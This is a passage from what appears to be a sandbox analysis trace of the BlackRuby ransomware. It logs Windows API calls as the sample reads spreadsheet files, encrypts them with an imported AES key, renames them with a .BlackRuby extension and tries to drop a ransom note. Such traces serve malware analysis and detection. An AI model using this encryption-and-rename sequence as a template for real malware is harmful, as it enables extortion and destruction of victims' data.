J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), fInfoLevelId=0x0, lpFileInformation=0x1b75bdc | out: lpFileInformation=0x1b75bdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3f4030, ftCreationTime.dwHighDateTime=0x1d35049, ftLastAccessTime.dwLowDateTime=0xc422f510, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0xc422f510, ftLastWriteTime.dwHighDateTime=0x1d354b7, nFileSizeHigh=0x0, nFileSizeLow=0x17266)) returned 1 [0058.453] GetLastError () returned 0x5 [0058.453] SetErrorMode (uMode=0x0) returned 0x1 [0058.454] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.454] GetLastError () returned 0x5 [0058.454] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.454] GetLastError () returned 0x5 [0058.454] SetErrorMode (uMode=0x1) returned 0x0 [0058.454] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.454] GetLastError () returned 0x0 [0058.454] GetFileType (hFile=0x184) returned 0x1 [0058.454] SetErrorMode (uMode=0x0) returned 0x1 [0058.454] GetFileType (hFile=0x184) returned 0x1 [0058.454] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x17266 [0058.454] GetLastError () returned 0x0 [0058.455] ReadFile (in: hFile=0x184, lpBuffer=0x2c59070, nNumberOfBytesToRead=0x17266, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c59070*, lpNumberOfBytesRead=0x18ecac*=0x17266, lpOverlapped=0x0) returned 1 [0058.456] GetLastError () returned 0x0 [0058.456] CloseHandle (hObject=0x184) returned 1 [0058.456] GetLastError () returned 0x0 [0058.456] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.457] GetLastError () returned 0x0 [0058.457] SetErrorMode (uMode=0x1) returned 0x0 [0058.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3f4030, ftCreationTime.dwHighDateTime=0x1d35049, ftLastAccessTime.dwLowDateTime=0xc422f510, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0xc422f510, ftLastWriteTime.dwHighDateTime=0x1d354b7, nFileSizeHigh=0x0, nFileSizeLow=0x17266)) returned 1 [0058.457] GetLastError () returned 0x0 [0058.457] SetErrorMode (uMode=0x0) returned 0x1 [0058.457] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c790) returned 1 [0058.457] GetLastError () returned 0x0 [0058.492] CryptImportKey (in: hProv=0x37c790, pbData=0x1bd1f80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360d20) returned 1 [0058.492] GetLastError () returned 0x0 [0058.492] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.492] GetLastError () returned 0x0 [0058.497] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.497] GetLastError () returned 0x0 [0058.497] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ce0) returned 1 [0058.497] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.497] GetLastError () returned 0x0 [0058.497] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1bfefcc*=0x1, dwFlags=0x0) returned 1 [0058.497] GetLastError () returned 0x0 [0058.497] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1bfef98, dwFlags=0x0) returned 1 [0058.497] GetLastError () returned 0x0 [0058.498] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c87680*, pdwDataLen=0x18ec9c*=0x17360, dwBufLen=0x17360 | out: pbData=0x2c87680*, pdwDataLen=0x18ec9c*=0x17360) returned 1 [0058.498] GetLastError () returned 0x0 [0058.499] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bff028*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bff028*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0058.499] GetLastError () returned 0x0 [0058.499] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bff058*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bff058*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0058.499] GetLastError () returned 0x0 [0058.500] CryptDestroyKey (hKey=0x360d20) returned 1 [0058.500] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.500] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.500] GetLastError () returned 0x0 [0058.500] SetErrorMode (uMode=0x1) returned 0x0 [0058.500] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.502] GetLastError () returned 0xb7 [0058.502] GetFileType (hFile=0x184) returned 0x1 [0058.502] SetErrorMode (uMode=0x0) returned 0x1 [0058.502] GetFileType (hFile=0x184) returned 0x1 [0058.504] CloseHandle (hObject=0x184) returned 1 [0058.504] GetLastError () returned 0xb7 [0058.504] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.504] GetLastError () returned 0xb7 [0058.504] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_84TmWVSKNBV5W3yY42KIGxNzWeUcVoSTtm5yDZPpGyb.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_84TmWVSKNBV5W3yY42KIGxNzWeUcVoSTtm5yDZPpGyb.BlackRuby", lpFilePart=0x0) returned 0x78 [0058.504] GetLastError () returned 0xb7 [0058.504] SetErrorMode (uMode=0x1) returned 0x0 [0058.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3f4030, ftCreationTime.dwHighDateTime=0x1d35049, ftLastAccessTime.dwLowDateTime=0xc422f510, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0x2b1195a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17370)) returned 1 [0058.504] GetLastError () returned 0xb7 [0058.504] SetErrorMode (uMode=0x0) returned 0x1 [0058.504] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\ty9ips7-_h2facxrkdwk.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_84TmWVSKNBV5W3yY42KIGxNzWeUcVoSTtm5yDZPpGyb.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\encrypted_84tmwvsknbv5w3yy42kigxnzweucvosttm5ydzppgyb.blackruby")) returned 1 [0058.504] GetLastError () returned 0xb7 [0058.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x51 [0058.505] GetLastError () returned 0xb7 [0058.505] SetErrorMode (uMode=0x1) returned 0x0 [0058.505] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.505] GetLastError () returned 0x5 [0058.506] SetErrorMode (uMode=0x0) returned 0x1 [0058.506] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", lpFilePart=0x0) returned 0x4c [0058.506] GetLastError () returned 0x5 [0058.506] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.506] GetLastError () returned 0x5 [0058.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.506] GetLastError () returned 0x5 [0058.506] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", lpFilePart=0x0) returned 0x4c [0058.506] GetLastError () returned 0x5 [0058.506] SetErrorMode (uMode=0x1) returned 0x0 [0058.506] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0058.506] GetLastError () returned 0x5 [0058.506] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.506] GetLastError () returned 0x5 [0058.506] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.506] GetLastError () returned 0x5 [0058.506] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.506] GetLastError () returned 0x12 [0058.506] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0058.506] SetErrorMode (uMode=0x0) returned 0x1 [0058.506] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps", lpFilePart=0x0) returned 0x4c [0058.506] GetLastError () returned 0x12 [0058.507] SetErrorMode (uMode=0x1) returned 0x0 [0058.507] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0058.507] GetLastError () returned 0x12 [0058.507] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.507] GetLastError () returned 0x12 [0058.507] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.507] GetLastError () returned 0x12 [0058.507] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.507] GetLastError () returned 0x12 [0058.507] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0058.507] SetErrorMode (uMode=0x0) returned 0x1 [0058.507] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.507] GetLastError () returned 0x12 [0058.507] SetErrorMode (uMode=0x1) returned 0x0 [0058.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), fInfoLevelId=0x0, lpFileInformation=0x1c1de24 | out: lpFileInformation=0x1c1de24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f96cc0, ftCreationTime.dwHighDateTime=0x1d3529e, ftLastAccessTime.dwLowDateTime=0xbacdc360, ftLastAccessTime.dwHighDateTime=0x1d3579f, ftLastWriteTime.dwLowDateTime=0xbacdc360, ftLastWriteTime.dwHighDateTime=0x1d3579f, nFileSizeHigh=0x0, nFileSizeLow=0xea6b)) returned 1 [0058.507] GetLastError () returned 0x12 [0058.507] SetErrorMode (uMode=0x0) returned 0x1 [0058.507] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.507] GetLastError () returned 0x12 [0058.507] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.507] GetLastError () returned 0x12 [0058.507] SetErrorMode (uMode=0x1) returned 0x0 [0058.507] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.507] GetLastError () returned 0x0 [0058.507] GetFileType (hFile=0x184) returned 0x1 [0058.507] SetErrorMode (uMode=0x0) returned 0x1 [0058.508] GetFileType (hFile=0x184) returned 0x1 [0058.508] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xea6b [0058.508] GetLastError () returned 0x0 [0058.508] ReadFile (in: hFile=0x184, lpBuffer=0x1c1f9cc, nNumberOfBytesToRead=0xea6b, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1c1f9cc*, lpNumberOfBytesRead=0x18ec40*=0xea6b, lpOverlapped=0x0) returned 1 [0058.508] GetLastError () returned 0x0 [0058.509] CloseHandle (hObject=0x184) returned 1 [0058.509] GetLastError () returned 0x0 [0058.509] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.509] GetLastError () returned 0x0 [0058.509] SetErrorMode (uMode=0x1) returned 0x0 [0058.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f96cc0, ftCreationTime.dwHighDateTime=0x1d3529e, ftLastAccessTime.dwLowDateTime=0xbacdc360, ftLastAccessTime.dwHighDateTime=0x1d3579f, ftLastWriteTime.dwLowDateTime=0xbacdc360, ftLastWriteTime.dwHighDateTime=0x1d3579f, nFileSizeHigh=0x0, nFileSizeLow=0xea6b)) returned 1 [0058.509] GetLastError () returned 0x0 [0058.509] SetErrorMode (uMode=0x0) returned 0x1 [0058.509] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c680) returned 1 [0058.509] GetLastError () returned 0x0 [0058.544] CryptImportKey (in: hProv=0x37c680, pbData=0x1c972ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360c20) returned 1 [0058.544] GetLastError () returned 0x0 [0058.544] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.544] GetLastError () returned 0x0 [0058.550] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x3609e0) returned 1 [0058.550] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1cc42f8*=0x1, dwFlags=0x0) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1cc42c4, dwFlags=0x0) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc4340*, pdwDataLen=0x18ec30*=0xeb60, dwBufLen=0xeb60 | out: pbData=0x1cc4340*, pdwDataLen=0x18ec30*=0xeb60) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce1a2c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1ce1a2c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0058.550] GetLastError () returned 0x0 [0058.550] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce1a5c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1ce1a5c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0058.550] GetLastError () returned 0x0 [0058.551] CryptDestroyKey (hKey=0x360c20) returned 1 [0058.551] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.551] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.551] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.551] GetLastError () returned 0x0 [0058.551] SetErrorMode (uMode=0x1) returned 0x0 [0058.551] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.552] GetLastError () returned 0xb7 [0058.552] GetFileType (hFile=0x184) returned 0x1 [0058.552] SetErrorMode (uMode=0x0) returned 0x1 [0058.552] GetFileType (hFile=0x184) returned 0x1 [0058.554] CloseHandle (hObject=0x184) returned 1 [0058.554] GetLastError () returned 0xb7 [0058.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls", lpFilePart=0x0) returned 0x5b [0058.554] GetLastError () returned 0xb7 [0058.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\Encrypted_JOhmiHY1FruhmRhcUhLXTR25PxukQhmPSRlK.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\Encrypted_JOhmiHY1FruhmRhcUhLXTR25PxukQhmPSRlK.BlackRuby", lpFilePart=0x0) returned 0x85 [0058.554] GetLastError () returned 0xb7 [0058.554] SetErrorMode (uMode=0x1) returned 0x0 [0058.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f96cc0, ftCreationTime.dwHighDateTime=0x1d3529e, ftLastAccessTime.dwLowDateTime=0xbacdc360, ftLastAccessTime.dwHighDateTime=0x1d3579f, ftLastWriteTime.dwLowDateTime=0x2b18b9c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xeb70)) returned 1 [0058.554] GetLastError () returned 0xb7 [0058.554] SetErrorMode (uMode=0x0) returned 0x1 [0058.554] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\5zlJXzgaEc.xls" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\5zljxzgaec.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\Encrypted_JOhmiHY1FruhmRhcUhLXTR25PxukQhmPSRlK.BlackRuby" (normalized: 